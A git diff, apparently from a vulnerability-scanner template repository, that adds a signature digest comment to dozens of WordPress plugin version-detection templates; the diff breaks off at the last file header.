a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde5..180e1c2420c 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220744eb91641bb50eb06d7207bc85ac71df0ef538cc85b2cf0b499bb3d6adce8ba0220273859d89081916b2ef77f2eb4b147ec4902e4ebcac526403584afdcb8e95842:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7d..a4ec782de3e 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c49aee778dfe2a9ba45cec3a411869d47a7557ce7d7df659912cf1649dafe282022100af6287fa78501fb4fdee4206a22e7d4f80d641579b40e1e7c6cb52d8137645dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea24..e692176b9d4 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220422ed29d6b38c4a02166e0a10159b6c4aa743e8e02cb600514093762ef2aed14022046095558c0f4f9cda91e1529f4e681e67ca650172e3b32bd545a0506d04ea0e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c7..c54fb225134 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220515dc2b9c11de53d44e4241736b1acbdf40107885bbb71ad7237ef369e6a5a6102207af1bb64526e3adcf78f601ed447a51a159a490c55dacb473d7fe54adbca5ce4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f64..a35a257577b 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b4e9dbaa12abfe6f07ec4ad30a4f0beb4c2c227fb303017e2e4ec13b367c8800220105cd67dad1e2b13a81c6fbff4becbf2d7939d7915ff8db05c05d6df56539fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff4..4cfd03ccec9 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029f6d3e9c7e33e7c5248d01a657f29b61c77ba87614726291617fd53ba63ba98022008c31eaef457284372f6f172416ebae6bed47fb1f99fa85bf45078941eb1fa10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1c..79a0d90b4cd 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbc3cb66d7292371eaa8538b079bd911983706a47a50d0944c8860f48aef99070220188ecf6c480f36488c8d48ffb10fcb7f2479264efcb924eb570e431d0e94ef14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751b..37bd5c4cde6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022032187e5fef30712c43c9d478f8bf5beaa9fba4289ff2391218ef8cb142a51af8022100fb2a6499eccd5026e285b57783c89452d8f65fb41acf79117120426848449ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e47..e57b6025e1e 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220605023b715939f04f8947cf09ecfb898c3c6b5f7d5505d3b85bf0068d54f9e2d0221009f03d6df8f0ae96f560fc963128839f5758ef598df7ed0045e70d19ac85f84a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb76..fd897dec1ad 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ed26b29c6b77fd422e4bbb418149a34d95d4572bf678de1ccc4ee823ad2b902022039f4cac26ff1aef342a18d6db60ef3a422f7a0cd9acca7ce62906353678d4935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e49..39cbb071b0d 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012d4a9f18514839dfd03ecdb200bb95fdbbd37c6b294ac127beffe7e98890495022100a20fdfcac7fd27bccbc21be7795edc74108249ab609d1047948081dd6cc11809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283de..8d23fd73b10 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7bfe95d6ec527f3760d3c0dccee679c39fb7b86dda53cc5e9ee789efd44c828022100af5b460ebd1d6a1fee0e71ec32e03e780d952510d50d78786417c0005c766c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3e..58fc2d3450e 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e1718a9fe05feec29ee5c22baab9981a104709485e3e1e777a51c30e973073e022021e151d6c6a75136dc2bc59f617e07b7e73acc96f87a0f1e745315f1a5c61364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd44..d3224d7436a 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c7da05a446a9e2af2e741048f3f4d629783b234863eeb90fd2edebedb70c4430221009eddf369e05e53c1d17827dabd4c0aabadaf0db550c17e8b6a2cee9d449b9bde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74c..9d58abb01bc 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015f643b58fabeeb984c3d9bd1bf96da2466fb25b216f523bd1073f1113250ffc022100bf8f4df37885a905ceb849acbde22f2dede23884b4f47874a8509622fededa0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074c..1cab735e643 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e05c67b09f5372b1747db1c5c02e812b128d59caab7f44559ff44126f7d25c502203a76fdc1d345b43c4cbbb23062aba71c0753f9a0e82535e1240958f8885ee940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5eb..5f0e0af7717 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d85a762584925f3c79b227b864fa9dc4445463abce96d4c58bbd6c4b2b934b1022100d8af6625686b328b1479f74b573d543b905fd1ebafc5f312e64f41e60afa72b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae30..d1a75317a87 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cfd8133b979c7c9a19be1834049c7ffba6cc62eb25edfb368b4ec4bd3c4d9ce1022100f815e3cfff54dddc5baba61cec1c27f50005f43dc41b2789e7d8d9ae7cd4f467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27a..da27aaa1cff 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040884d9fa8840e1aa2766ac89864a224b11a42dfb68de5405f16de6283a7ad55022047bf60599755967410e577c0d83d594d8224fdb326e442935007cfc94899f71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f047..c4df8602862 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8a1527cd448a16679dd288dcc2f8b9a9e63422556e1c35bfb59421e61ef73600220552aa0cc1409d8d2f191d10e4dcaebf338c6b75ffaa7b2bb26b6765236097334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f5..781ec0cf99a 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d46156ad07af0a090fb6e46d19e8632fd5dc53be2248e7559af9b34c860104480221008ba13baf1ad9d823bb8b7276ff5c88ca5e52a42384e52a957e950985db7c02d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea697..3eb3fac4996 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f2f679fc5b152b1fff9cf660a1485b277c88fc6e41822734a82f3da773a67ba0220425c9c0cd6d477a41f3028c52b24041171883383368cd3c6e8c9e508ba67b23f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce85..dc62f7a3b8e 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbcab9946e50c30df650a3d3010e4a6eaeabe60f658ba586793446096da6af2c0220205f9baff276094f3bd4026e1bdb528d8b0224db1441d1debde7ebd30a286b28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1c..4c1c834edd4 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100858b173ab938da480917c36ded63ef50e1e669c4646e52e2d318da5971f4f73002204180560541ce40fc3c7d086faeb3cd507c6b0bee1bb35067441554a68b8d687d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2b..d9459b0fabb 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098e63f19d9351cdc29e0b2d05a4ae17d4a585275fc00ebf32c891b6b1b2b3462022069c3997c900ae599f731dbf79dad10fe9945f8267cd02dd67703046023e669b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0c..656c9ad6f96 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a2a8dc2393209f7ac5feac1eb0c597de85e701fc35cf232aafc7514e88a704702205ac1230312e8eeac6ae300a66c1521e243f0b0931bba847cb0dbb213b2fdf28e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca7..d6623579cf2 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220499f6618feaa0a1562b30b68faca8cf2afc6c8fe6e49a5e9615568e25f3b2fbd022100f27b15eb505ba12936a1eb58269d9f22afd8f3dfeaf9b8e89754afe35498af36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5dfe..c0e7d90e4c6 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a73b335c17c9df0520a64dbd9a0a9611c6688f6720cb1f4baca734263f553cb0220456270f9fae25ae2de55e0f16217a4d5a5f4864ea43b8937b8ea455669848e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f7..142ad876eb6 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb7b0a1ebd65ae8dd2d4ea7237cf40c79e3b6cf9b92ab4bd69ed2f1b828e987a02203e50458edae9c1e2b671a0bf64fafa2a2273ed7f1d185ade7497b9278f9b3a15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e7..e0fa3f37b1a 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210093946d3a6367fc4c60e0101fae7fa8ce5aab4c452826a6f1436e3fcb5a4237f20221008e177214dbfbbf7db96e1938e6cc48f8eeab9bf3681d7bc75950f76d010d5571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e3..84f985db7e7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c9e429ddc13b164062c9a3ebffd3539a04a53b72162be2434f5c45dd4fca58ab02210083933f05eaea657ca6b0f6def9ba3899ab8d63910f0a0b0c5227b952adca3afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4fa..0fc7039e023 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed7d05fb8e5d1aa0a472a1cf5e45b45bb9cefffe77521d87ba56a92c914c32ab0220575a74b3bdce4ca8203e505104117950444446f86b396f04d4c5c226cdcaf2ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e9..2c886aa65c2 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc4be198102919aea77ecfec5af78fda600dd8ce0f198487f369bbf0a94a3f7302203083b289994588a8384f85497ef1a7f02cb3f7e072f435de6c24591d5f8f01f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f96..147c50bb11d 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064f69f09ea3b353ff2e0bac812dfcf7cebdbeacf21121034f515a4b4967daddf02200922ce449889ab5a8c8c3907ad4d4056818015fe04cfbe306406d299398f327a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a27..5989150e84d 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203fa66c93d31732320a715a7082c540d1d820d2a6debe581e05b07bfbd555ac3502201a2c91c0bf1bd9b4be2135cd9df5e5a632c55f88f62e7fc241589ee7cb2d0667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e45..85459bd028d 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c9f9732d457a4a9a7f9554ed8cddafeed5426c53bbabd53c44000fb775d8930022100b6cf05e8444ee5182b91bcf12b6190379b173eab3268339720d2049c95f91ffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9dfa..41bbcd76bfa 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022a91f8ed401de111ddae260194cf5735d09dfb1f720fc1d7779a52431536f9e02207517f8b9bbdf36486b223c6c3b41d88b518b830f8371b1272c605d58686d43b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d19..3f1e46b697a 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201355fe9676039f3f3250e4ddceac44871f2f6fea4e35c1b171bab941ed5bfbd5022100961d7080d41a338f44edaa49addb894c93db8d394523160f95d6ddad82d8737a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d46328..2b697d20ef5 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220324ac0c6a9a8d3908ec15590a27c137486c83cc12dcb4165834a134d531469ef022045b5b98141be780e4e7fa37b534d17fc564089ae4a8847d4910491d05116570a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c7..416cddbe3cd 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b7ab5d8cc81f3c1d4d2033456a7c6fc701bd260f4984c2e49ca7ad404324c97022046a407f160785ba69265aeeff380a12855abf8fd16ebe3624267eb134af056b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee17..f70e15925e7 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e5b544f81b093d248d899fe1a437cae8cab2eafdeeeee5c27f35bbade9b81c3022052ffb15bef316bf390a708ac98cc912e05d5fdfe3eb4f08f59e15745ec074f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e41..7d27b6b133d 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022048dc64b81960a36a7f20e45f411a53fbd5f5e74b08bf23893a5787edd300827e022024de8b698526e4fc0cdf787642efb4e11f8ed953e6968352b83c3a142bdee09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a1..a3539694f01 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d2b6f44905ec8a14c337e885cccd5fff63117e03f4b5df5235832960c3ff3b50221008a7f0ad32bd5432b83da016de1046f88bd941b7b7ce953f0624a4bd1c8c25e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfcf..6a80eb47580 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7a0fb3adcd47523bdee18be952d98531a0aaded929ef2894f788e653012ab6b0220247db716aca4d973d36d507a3efa016e2e63c863ec10e0020b9d919ada937f21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d31..11b3b8d1fdb 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049f17159b436bd198b49dbb41c930156d914a5d686c542fd5b458cf3de33f13f022057a9fe2974ee754830f3c8757320ad742151342259becc7271d1b0f33d7f9736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db688..4ed215c4380 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb57dc3ccbb210dd8b94b7125a1266ca8698df592e3ff2d210445dd8c5b2f9780221009ff03512541f11a8ba25dd1cc597c0f89a3f632ab4cc53c8b24b781264db7cf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3dbb..03175cf3f89 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205b4f0ead58ff49be7e96570a02d10f249a9f79038aa8cfcf1805797a92fbb41d022004e39de5d4764d9d0f6ff47913b781c1981ee70a62fbced48a6802b67d78acad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca381..abfd4d224ce 100644 --- 